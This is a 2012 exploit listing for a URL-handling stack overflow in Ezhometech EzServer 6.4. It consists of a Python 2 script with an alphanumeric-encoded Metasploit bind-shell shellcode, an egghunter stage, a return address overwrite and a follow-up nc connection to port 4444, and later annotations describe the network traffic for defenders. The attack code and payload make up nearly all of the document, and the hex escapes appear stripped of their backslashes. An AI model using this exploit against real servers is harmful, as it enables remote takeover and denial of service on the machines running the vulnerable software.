
Ezhometech Ezserver 6.4 Stack Overflow

Posted on 19 June 2012

# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/
### Software Description
# EZserver is a Video Server that stream Full HD to various devices.
### Vulnerability Details
# Buffer overflow condition exist in URL handling, sending long GET request
# will cause server process to exit and may allow malicious code injection.
# Further research found that the application does not care about the HTTP method,
# so that by sending long characters will make the program crash.
### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor, POC release.
#!/usr/bin/python
"""
Proof-of-concept for the 2012 advisory in the header: an oversized request to
the EzServer HTTP listener (TCP 8000) overruns a stack buffer in URL handling.

Reading notes (grounded in this listing only):

- Every byte string below is printed as "x41"-style text. The backslash of
  each backslash-x escape appears to have been lost in extraction, so as
  shown these are plain ASCII characters rather than the intended bytes;
  the byte counts in the author's comments refer to the original escapes.
- What a defender would see on the wire: a single request to TCP 8000 that
  carries no valid HTTP method, about 11 KB long for options 1/2 (padding
  plus `buff`, which starts with the marker "w00tw00t") or 10 000 bytes of
  "C" for option 3; after a successful run the script connects to the target
  on TCP 4444 with `nc`, i.e. a new inbound listener appears on the victim.
- The vendor log records no fix, and the only tested configurations have
  DEP in OptIn mode.
- This is Python 2 code (`print` statements, `raw_input`); `input()` at the
  bottom evaluates the typed text as an expression in Python 2.
"""
import sys
import struct
# Star import: the names socket, AF_INET and SOCK_STREAM used below come from here.
from socket import *
from os import system
from time import sleep

# 32-byte stage appended after the packed address in `buff`. It embeds the
# bytes x77 x30 x30 x74 ("w00t"), the same tag `buff` opens with as "w00tw00t",
# and the status messages below call it the "hunter" — so it appears to be a
# tag-searching stub that locates the main payload (TODO confirm; the page
# does not document it further).
hunt = (
"x66x81xCAxFFx0Fx42x52x6A"
"x02x58xCDx2Ex3Cx05x5Ax74"
"xEFxB8x77x30x30x74x8BxFA"
"xAFx75xEAxAFx75xE7xFFxE7")

#windows/shell_bind_tcp - 751 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444,
# Per the author's comments above: a bind-shell listening on TCP 4444, which
# is the port the `nc` call in winxp()/win2k3() connects to afterwards.
shellcode = ("x89xe5xdaxcfxd9x75xf4x5dx55x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4dx38x4cx49x45x50"
"x35x50x53x30x35x30x4bx39x4ax45x36x51x38x52x33"
"x54x4cx4bx50x52x56x50x4cx4bx46x32x44x4cx4cx4b"
"x30x52x45x44x4cx4bx33x42x37x58x44x4fx38x37x51"
"x5ax57x56x50x31x4bx4fx36x51x4fx30x4ex4cx47x4c"
"x53x51x43x4cx34x42x46x4cx37x50x49x51x38x4fx54"
"x4dx53x31x38x47x4ax42x4ax50x36x32x56x37x4cx4b"
"x56x32x44x50x4cx4bx37x32x37x4cx43x31x38x50x4c"
"x4bx37x30x33x48x4bx35x59x50x54x34x31x5ax33x31"
"x4ex30x36x30x4cx4bx30x48x52x38x4cx4bx56x38x57"
"x50x53x31x4ex33x4ax43x57x4cx30x49x4cx4bx50x34"
"x4cx4bx53x31x39x46x50x31x4bx4fx36x51x59x50x4e"
"x4cx59x51x48x4fx34x4dx45x51x59x57x50x38x4bx50"
"x53x45x5ax54x33x33x53x4dx4bx48x47x4bx33x4dx31"
"x34x42x55x4ax42x46x38x4cx4bx36x38x31x34x45x51"
"x38x53x55x36x4cx4bx54x4cx50x4bx4cx4bx50x58x35"
"x4cx43x31x59x43x4cx4bx34x44x4cx4bx35x51x48x50"
"x4cx49x31x54x31x34x57x54x51x4bx31x4bx55x31x56"
"x39x30x5ax50x51x4bx4fx4dx30x31x48x31x4fx30x5a"
"x4cx4bx54x52x5ax4bx4dx56x51x4dx33x58x37x43x47"
"x42x45x50x53x30x43x58x34x37x53x43x46x52x31x4f"
"x50x54x52x48x30x4cx54x37x46x46x53x37x4bx4fx39"
"x45x58x38x4cx50x55x51x43x30x45x50x37x59x58x44"
"x46x34x56x30x53x58x31x39x4dx50x32x4bx45x50x4b"
"x4fx58x55x36x30x56x30x56x30x46x30x47x30x46x30"
"x31x50x46x30x55x38x4ax4ax44x4fx39x4fx4bx50x4b"
"x4fx48x55x4dx59x59x57x50x31x59x4bx30x53x55x38"
"x55x52x35x50x52x31x51x4cx4bx39x4ax46x32x4ax32"
"x30x31x46x50x57x35x38x49x52x59x4bx56x57x53x57"
"x4bx4fx39x45x30x53x51x47x52x48x4ex57x4dx39x37"
"x48x4bx4fx4bx4fx49x45x51x43x50x53x30x57x35x38"
"x44x34x5ax4cx47x4bx4bx51x4bx4fx49x45x56x37x4c"
"x49x58x47x43x58x34x35x42x4ex50x4dx53x51x4bx4f"
"x58x55x55x38x43x53x52x4dx33x54x55x50x4cx49x4b"
"x53x51x47x46x37x31x47x36x51x4cx36x33x5ax42x32"
"x31x49x46x36x5ax42x4bx4dx45x36x48x47x47x34x31"
"x34x37x4cx55x51x33x31x4cx4dx30x44x47x54x44x50"
"x48x46x35x50x30x44x30x54x30x50x46x36x51x46x56"
"x36x37x36x46x36x30x4ex31x46x51x46x51x43x31x46"
"x32x48x52x59x48x4cx57x4fx4bx36x4bx4fx38x55x4d"
"x59x4dx30x50x4ex56x36x51x56x4bx4fx36x50x43x58"
"x54x48x4cx47x55x4dx33x50x4bx4fx4ex35x4fx4bx4a"
"x50x58x35x4fx52x36x36x53x58x49x36x4dx45x4fx4d"
"x4dx4dx4bx4fx58x55x47x4cx43x36x53x4cx35x5ax4d"
"x50x4bx4bx4dx30x54x35x55x55x4fx4bx57x37x35x43"
"x32x52x52x4fx43x5ax45x50x51x43x4bx4fx4ex35x41"
"x41")

# Leading padding; the two bind-shell options differ only in its length
# (5025 for Windows XP SP3, 5029 for Windows 2003 SP2), the crash-only
# option sends 10 000 filler characters and nothing else.
junk1 = "x41" * 5025
junk2 = "x42" * 5029
junk3 = "x43" * 10000

# Payload tail shared by winxp() and win2k3(). Layout, in order: the tag
# "w00tw00t", the bind-shell stage, 100 filler characters, a 4-character
# sequence the page does not explain, the 32-bit little-endian value
# 0x10212779 (the page does not say which module or instruction it refers
# to — presumably the overwritten return address, TODO confirm), 16 more
# filler characters, the `hunt` stage, then 5000 trailing characters.
buff = "w00tw00t"
buff+= shellcode
buff+= "x90" * 100
buff+= "xebx08x90x90"
buff+= struct.pack('<L', 0x10212779)
buff+= "x90" * 16
buff+= hunt
buff+= "x44" * 5000

def winxp():
    """Menu option 1 (Windows XP SP3).

    Prompts for a target IP, sends junk1+buff to TCP 8000 in a single
    send(), closes the socket, sleeps 5 s + 2 s, then shells out to
    `nc -v <host> 4444`. Any exception (including KeyboardInterrupt during
    the sleeps, because the except clause is bare) is reported as a
    connection failure and the process exits.
    """
    try:
        host = raw_input("[!] Target IP: ")
        print "[!] Connecting to %s on port 8000" %host
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host,8000))
        print "[+] Launching attack.."
        print "[+] Sending payload.."
        payload = junk1+buff
        # One send() call; nothing checks that the whole payload was written.
        s.send (payload)
        s.close()
        print "[+] Wait for hunter.."
        sleep(5)
        print "[+] Connecting to target shell!"
        sleep(2)
        # `host` is interpolated unquoted into a shell command line; it comes
        # from the operator's own prompt above, but it is still not validated.
        system("nc -v %s 4444" %host)
    except:
        print "[x] Could not connect to the server x_x"
        sys.exit()

def win2k3():
    """Menu option 2 (Windows 2003 SP2).

    Identical to winxp() except that the padding is junk2 (5029 characters)
    and the second pause is 1 s instead of 2 s. Same bare except / exit
    behaviour on any error.
    """
    try:
        host = raw_input("[!] Target IP: ")
        print "[!] Connecting to %s on port 8000" %host
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host,8000))
        print "[+] Launching attack.."
        print "[+] Sending payload.."
        payload = junk2+buff
        # One send() call; the return value (bytes actually sent) is ignored.
        s.send(payload)
        s.close()
        print "[+] Wait for hunter.."
        sleep(5)
        print "[+] Connecting to target shell!"
        sleep(1)
        # Unquoted operator-supplied host on a shell command line (see winxp()).
        system("nc -v %s 4444" %host)
    except:
        print "[x] Could not connect to the server x_x"
        sys.exit()

def crash():
    """Menu option 3 (crash only, for use under a debugger).

    Sends junk3 — 10 000 filler characters, no payload — to TCP 8000 and
    closes the socket. Reproduces the denial-of-service described in the
    header without the bind-shell stage; same bare except / exit on error.
    """
    try:
        host = raw_input("[!] Target IP: ")
        print "[!] Connecting to %s on port 8000" %host
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host,8000))
        print "[+] Launching attack.."
        print "[+] Sending payload.."
        payload = junk3
        s.send (payload)
        s.close()
        print "[+] Server should be crashed! Check your debugger"
    except:
        print "[x] Could not connect to the server x_x"
        sys.exit()

# Interactive menu: up to three attempts to pick an option, then the loop
# simply ends. Each chosen option calls sys.exit() after it returns.
print "#################################################################"
print "# EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit #"
print "# by modpr0be[at]spentera | @modpr0be #"
print "# thanks to: otoy, cikumel, y0k | @spentera #"
print "================================================================="
print " 1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print " 2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print " 3.Crash only (debug) "
a = 0
while a < 3:
    a = a + 1
    # Python 2 input() is eval(raw_input()): the typed text is executed as an
    # expression, and anything that is not an int falls through to the
    # "pick the right one" branch (or raises, which is not caught here).
    op = input ("[!] Choose your target OS: ")
    if op == 1:
        winxp()
        sys.exit()
    elif op == 2:
        win2k3()
        sys.exit()
    elif op == 3:
        crash()
        sys.exit()
    else:
        print "[-] Oh plz.. pick the right one :) "

 
